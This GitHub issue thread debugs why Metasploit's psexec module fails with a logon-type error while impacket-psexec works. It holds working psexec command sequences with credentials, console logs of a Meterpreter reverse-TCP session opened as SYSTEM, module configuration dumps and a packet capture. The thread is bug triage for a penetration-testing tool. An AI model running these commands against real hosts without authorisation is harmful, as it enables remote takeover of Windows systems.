exploit/windows/smb/psexec does not work while impacket-psexec does

[friedrico]

Why does exploit/windows/smb/psexec react different from impacket-psexec? Shouldnt they do the same thing?

impacket-psexec "loca:Pass"@172....
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.....
[*] Found writable share ADMIN$
[*] Uploading file fPZKRTEM.exe
[*] Opening SVCManager on 172.....
[*] Creating service tQTR on 172.....
[*] Starting service tQTR.....
[!] Press help for extra shell commands                                                                                                                                                                                                                                      Microsoft Windows [Version 10.0.16299.192]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

use exploit/windows/smb/psexec
set rhosts  172...
set lhost tap0
set smbuser loca
set smbpass Pass
run
[*] Started reverse TCP handler on 17...:4444 
[*] 172....:445 - Connecting to the server...
[*] 172....:445 - Authenticating to 172...:445 as user 'loca'...
[-] 172....:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

• All of the item points within this tempate
• The result of the debug command in your Metasploit console
• Screenshots showing the issues you're having
• Exact replication steps

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

[adfoster-r7]

cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔

[cdelafuente-r7]

I just tested against Windows 10 version 20H2 and could not reproduce the issue:

msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                <redacted_ip>    yes       The target host(s), range CIDR identifier, or hosts file with sy
                                                    ntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) o
                                                    r a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               <redacted>       no        The password for the specified username
   SMBUser               smbtest          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted_ip>    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-UUQE0B4
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@friedrico, that would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get meaningful packet capture:

set SMB::AlwaysEncrypt false

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[friedrico]

Sorry, havent had time.

I just repeated the actions - still the same problem. Even if I used set SMB::AlwaysEncrypt false

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

``` [framework/ui/console] ActiveModule=exploit/windows/smb/psexec [windows/smb/psexec] WfsDelay=10 EXITFUNC=thread WORKSPACE= VERBOSE=true EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=172... RPORT=445 SSL=false SSLVersion=Auto SSLVerifyMode=PEER SSLCipher= Proxies= CPORT= CHOST= ConnectTimeout=10 TCP::max_send_size=0 TCP::send_delay=0 DCERPC::max_frag_size=4096 DCERPC::fake_bind_multi=true DCERPC::fake_bind_multi_prepend=0 DCERPC::fake_bind_multi_append=0 DCERPC::smb_pipeio=rw DCERPC::ReadTimeout=10 NTLM::UseNTLMv2=true NTLM::UseNTLM2_session=true NTLM::SendLM=true NTLM::UseLMKey=false NTLM::SendNTLM=true NTLM::SendSPN=true SMB::pipe_evasion=false SMB::pipe_write_min_size=1 SMB::pipe_write_max_size=1024 SMB::pipe_read_min_size=1 SMB::pipe_read_max_size=1024 SMB::pad_data_level=0 SMB::pad_file_level=0 SMB::obscure_trans_pipe_level=0 SMBDirect=true SMBUser=loca SMBPass=pass SMBDomain=. SMBName=*SMBSERVER SMB::VerifySignature=false SMB::ChunkSize=500 SMB::Native_OS=Windows 2000 2195 SMB::Native_LM=Windows 2000 5.0 SMB::ProtocolVersion=1,2,3 SMB::AlwaysEncrypt=false SERVICE_NAME= SERVICE_DISPLAY_NAME= SERVICE_DESCRIPTION= SERVICE_PERSIST=false Powershell::persist=false Powershell::prepend_sleep= Powershell::prepend_protections_bypass=true Powershell::strip_comments=true Powershell::strip_whitespace=false Powershell::sub_vars=true Powershell::sub_funcs=false Powershell::exec_in_place=false Powershell::exec_rc4=false Powershell::remove_comspec=false Powershell::noninteractive=true Powershell::encode_final_payload=false Powershell::encode_inner_payload=false Powershell::wrap_double_quotes=true Powershell::no_equals=false Powershell::method=reflection EXE::EICAR=false EXE::Custom= EXE::Path= EXE::Template= EXE::Inject=false EXE::OldMethod=false EXE::FallBack=false MSI::EICAR=false MSI::Custom= MSI::Path= MSI::Template= MSI::UAC=false SMBSHARE= ALLOW_GUEST=false SERVICE_FILENAME= PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe SERVICE_STUB_ENCODER= CMD::DELAY=3 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=tap0 ```

History

The following commands were ran during the session and before this issue occurred:

Collapse

``` 2000 use exploit/windows/smb/psexec 2001 set smbuser loca 2002 set smbpass pass 2003 set rhosts 172... 2004 set lhost tap0 2005 set verbose true 2006 set SMB::AlwaysEncrypt false 2007 run 2008 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

``` ... [09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

``` ... [09/28/2021 04:19:30] [d(0)] core: HistoryManager.pop_context name: :msfconsole [09/28/2021 04:19:36] [d(0)] core: HistoryManager.push_context name: :msfconsole [09/28/2021 04:20:05] [d(0)] core: HistoryManager.pop_context name: :msfconsole [09/28/2021 04:20:10] [d(0)] core: HistoryManager.push_context name: :msfconsole [09/28/2021 04:20:53] [d(0)] core: HistoryManager.pop_context name: :msfconsole [09/28/2021 04:20:58] [d(0)] core: HistoryManager.push_context name: :msfconsole [09/28/2021 04:22:05] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [09/28/2021 04:22:06] [d(0)] core: Negotiated SMB version: SMB3 [09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse

``` Framework: 6.1.7-dev Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: Connected to msf. Connection type: postgresql. Install Method: Other - Please specify ```

base64(pcap):

sanitized

base64 -d <<< BASE64STR > my.pcap

Collapse

``` 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 ```

Can I unclose the issue?

[adfoster-r7]

@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?

[friedrico]

@friedrico Thanks for the update +1 Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?

meterpreter > sysinfo
Computer        : WIN7
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : ...
Logged On Users : 6
Meterpreter     : x86/windows

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[jeffmcjunkin]

Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?

This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo:

meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name:                 irrelevant
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00329-10181-97955-AA169
Original Install Date:     5/3/2022, 11:35:25 PM
System Boot Time:          11/11/2022, 6:44:39 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
                           [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use:    1,449 MB

Metasploit version:

msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console  : 6.0.27-dev-

[jeffmcjunkin]

Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.

[adfoster-r7]

@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error

If there's more details for how to create an env to reproduce this error that would be appreciated 💯

---

Edit: I added a user to the Deny access to this computer from the network gpo and got the STATUS_LOGON_TYPE_NOT_GRANTED error:

msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:p4$$w0rd@192.168.123.13

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.

but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔

python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:p4$$w0rd@192.168.123.13'       
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

